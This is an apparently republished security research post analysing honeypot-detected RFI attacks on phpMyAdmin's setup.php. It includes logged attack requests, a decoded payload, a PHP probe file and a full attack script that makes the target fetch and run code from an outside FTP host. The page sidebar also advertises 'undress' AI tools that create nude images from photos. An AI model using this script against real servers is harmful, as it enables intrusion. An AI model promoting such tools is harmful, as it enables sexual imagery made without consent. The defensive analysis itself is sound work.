首页 php教程 php手册 PhpMyAdmin setup.php RFI Attacks Detected

PhpMyAdmin setup.php RFI Attacks Detected

Jun 06, 2016 pm 08:00 PM
phpmyadmin

SpiderLabs is the corporate sponsor of the WASC Distributed Web Honeypots Project which is an awesome research project to identify automated web attacks. I was looking in our centralModSecurity AuditConsole logging host today and I noticed

SpiderLabs is the corporate sponsor of the WASC Distributed Web Honeypots Project which is an awesome research project to identify automated web attacks.  I was looking in our central ModSecurity AuditConsole logging host today and I noticed a spike in traffic from some Russian IPs that were scanning for the PMASA-2010-4 vulnerability in the PhpMyAdmin setup.php script.

PhpMyAdmin setup.php RFI Attacks Detected

Let's look at the raw ModSecurity audit log data of the inbound request:

--4064df0e-A--
[10/Apr/2012:18:05:55 +0000] T4R2gwowybkAAHp9G@sAAAAF 212.24.61.167 38767 XXX.XXX.XXX.XXX 80
--4064df0e-B--
POST /pma/scripts/setup.php HTTP/1.1
Connection: close
Host: 176.34.207.219
Referer: 176.34.207.219
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
Content-Type: application/x-www-form-urlencoded
Content-Length: 238

--4064df0e-C--
action=lay_navigation&eoltype=unix&token=&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A55%3A%22ftp%3A%2F%2Fthewinecompany%3AgXNbUEwfLa%4046%2E32%2E228%2E222%2F%2Ea%2Fid%2Etxt%22%3B%7D%7D
登录后复制

If we URL decode the request body data, we get this:

action=lay_navigation&eoltype=unix&token=&configuration=a:1:{i:0;O:10:"PMA_Config":1:
{<span><strong>s:6:"source";s:55:"ftp://thewinecompany:gXNbUEwfLa@46.32.228.222/.a/id.txt"</strong></span>;}}
登录后复制

As you can see, the attacker is attempting overwrite the PhpMyAdmin configuration file by instructing it to use FTP to download and run the "id.txt" file on a remote site.  The contents of the id.txt file is PHP code:

<?php print(base64_decode("c3Q0cjc="));
echo(php_uname());
print(base64_decode("ZjFuMTVo"));
die;
?>
登录后复制

Looking at what this file is doing, it appears to be a simple probe to identify if the target web application is vulnerable to this type of RFI attack.  If the application responds with the output from these PHP commands, then the attacker will proceed with other attacks.  SpiderLabs Research was able to find the following script in public forums that launch similar attacks:

/* wtf zmeu was here haha,yeah me... found this sh*t bug on pmasux */
$arguments = getopt("a:b:c");

$pma_setup_url = $arguments[a];
//echo $arguments[a];
$ftp_code = 'ftp://devil:devil@85.10.138.51/c.txt';

//$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent
function send_data($method, $url, $data = '', $referer_string = '', $cookie_string = '', $ua_string = '')
{
$return = '';
$feof_count = 0;
$parsed_url = parse_url($url);
$site = $parsed_url;
$path = $parsed_url;
$query = $parsed_url;

($method == 'GET' && !empty($data)) ? $path .= '?'.$data : '';
($method == 'POST' && !empty($query)) ? $path .= '?'.$query : '';

$fp = fsockopen($site, 80, $errno, $errstr, 30);
($method == 'POST') ? $out = "POST $path HTTP/1.1\r\n" : $out = "GET $path HTTP/1.1\r\n";
$out .= "Host: $site\r\n";
$out .= "Content-type: application/x-www-form-urlencoded\r\n";
$out .= "Connection: Close\r\n";
$out .= "User-Agent: $ua_string\r\n";
$out .= "Referer: $referer_string\r\n";
$out .= "Cookie: $cookie_string\r\n";
($method == 'POST') ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" : $out .= "\r\n";
($method == 'POST') ? fwrite($fp, $out.$data) : fwrite($fp, $out);

while (!feof($fp))
{
if($feof_count >=200)
break;

$return .= fread($fp, 4800);
++$feof_count;
}

fclose($fp);
return $return;
}

$token_page = send_data('GET',$pma_setup_url,'',$pma_setup_url,'','Opera');

preg_match('@name="token" value="(a-f0-9{32})"@is',$token_page,$token_array);

$token = $token_array[1];

preg_match_all('@Set-Cookie: (<span>^\r\n;</span>+)@is',$token_page,$cookie_array);

$cookie_array = $cookie_array[1];
$cookie_array = implode("; ",$cookie_array);

print
send_data('POST',$pma_setup_url,'action=lay_navigation&eoltype=unix&token='.$token.'&configuration='.urlencode('a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($ftp_code).':"'.$ftp_code.'";}}'),$pma_setup_url,$cookie_array,'Opera');
登录后复制

 This issue was patched in the php source code with the following update:

PhpMyAdmin setup.php RFI Attacks Detected
By filtering out non-word characters, it would prevent the attacker from injecting the RFI code.

本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn

热AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智能驱动的应用程序,用于创建逼真的裸体照片

AI Clothes Remover

AI Clothes Remover

用于从照片中去除衣服的在线人工智能工具。

Undress AI Tool

Undress AI Tool

免费脱衣服图片

Clothoff.io

Clothoff.io

AI脱衣机

AI Hentai Generator

AI Hentai Generator

免费生成ai无尽的。

热门文章

R.E.P.O.能量晶体解释及其做什么(黄色晶体)
2 周前 By 尊渡假赌尊渡假赌尊渡假赌
仓库:如何复兴队友
1 个月前 By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island冒险:如何获得巨型种子
4 周前 By 尊渡假赌尊渡假赌尊渡假赌

热工具

记事本++7.3.1

记事本++7.3.1

好用且免费的代码编辑器

SublimeText3汉化版

SublimeText3汉化版

中文版,非常好用

禅工作室 13.0.1

禅工作室 13.0.1

功能强大的PHP集成开发环境

Dreamweaver CS6

Dreamweaver CS6

视觉化网页开发工具

SublimeText3 Mac版

SublimeText3 Mac版

神级代码编辑软件(SublimeText3)

phpmyadmin怎么设置主键 phpmyadmin怎么设置主键 Apr 07, 2024 pm 02:54 PM

表的主键是一列或多列,用于唯一标识表中每条记录。设置主键的步骤如下:登录 phpMyAdmin。选择数据库和表。勾选要作为主键的列。点击 "保存更改"。主键具有数据完整性、查找速度和关系建模方面的好处。

wordpress的数据库存在什么地方 wordpress的数据库存在什么地方 Apr 15, 2024 pm 10:39 PM

WordPress 数据库位于 MySQL 数据库中,存储着所有网站数据,可以通过托管提供商的仪表板、FTP 或 phpMyAdmin 访问。数据库名称与网站 URL 或用户名相关,访问需要使用数据库凭据,包括名称、用户名、密码和主机名,这些凭据通常存储在“wp-config.php”文件中。

phpmyadmin怎么添加外键 phpmyadmin怎么添加外键 Apr 07, 2024 pm 02:36 PM

在 phpMyAdmin 中添加外键可以通过以下步骤实现:选择包含外键的父表。编辑父表结构,在“列”中添加新列。启用外键约束,选择引用表和键。设置更新/删除操作。保存更改。

phpmyadmin账号密码是什么 phpmyadmin账号密码是什么 Apr 07, 2024 pm 01:09 PM

PHPMyAdmin 的默认用户名和密码为 root 和空。为了安全起见,建议更改默认密码。更改密码的方法:1. 登录 PHPMyAdmin;2. 选择 "privileges";3. 输入新密码并保存。忘记密码时,可通过停止 MySQL 服务并编辑配置文件的方式重置密码:1. 添加 skip-grant-tables 行;2. 登录 MySQL 命令行并重置 root 密码;3. 刷新权限表;4. 删除 skip-grant-tables 行,重启 MySQL 服务。

phpmyadmin日志在哪里 phpmyadmin日志在哪里 Apr 07, 2024 pm 12:57 PM

PHPMyAdmin日志文件的默认位置:Linux/Unix/macOS:/var/log/phpmyadminWindows:C:\xampp\phpMyAdmin\logs\日志文件用途:故障排除审计安全性

phpmyadmin怎么删除数据表 phpmyadmin怎么删除数据表 Apr 07, 2024 pm 03:00 PM

phpMyAdmin 中删除数据表的步骤:选择数据库和数据表;点击“操作”选项卡;选择“删除”选项;确认并执行删除操作。

为什么phpmyadmin拒绝访问 为什么phpmyadmin拒绝访问 Apr 07, 2024 pm 01:03 PM

phpMyAdmin 拒绝访问的原因及解决方案:认证失败:检查用户名和密码是否正确。服务器配置错误:调整防火墙设置,检查数据库端口是否正确。权限问题:授予用户对数据库的访问权限。会话超时:刷新浏览器页面重新连接。phpMyAdmin 配置错误:检查配置文件和文件权限,确保启用了必需的 Apache 模块。服务器问题:等待一段时间后再重试或联系主机提供商。

phpmyadmin漏洞属于什么漏洞 phpmyadmin漏洞属于什么漏洞 Apr 07, 2024 pm 01:36 PM

phpMyAdmin 易受多种漏洞影响,包括:1. SQL 注入漏洞;2. 跨站点脚本 (XSS) 漏洞;3. 远程代码执行 (RCE) 漏洞;4. 本地文件包含 (LFI) 漏洞;5. 信息泄露漏洞;6. 权限提升漏洞。

See all articles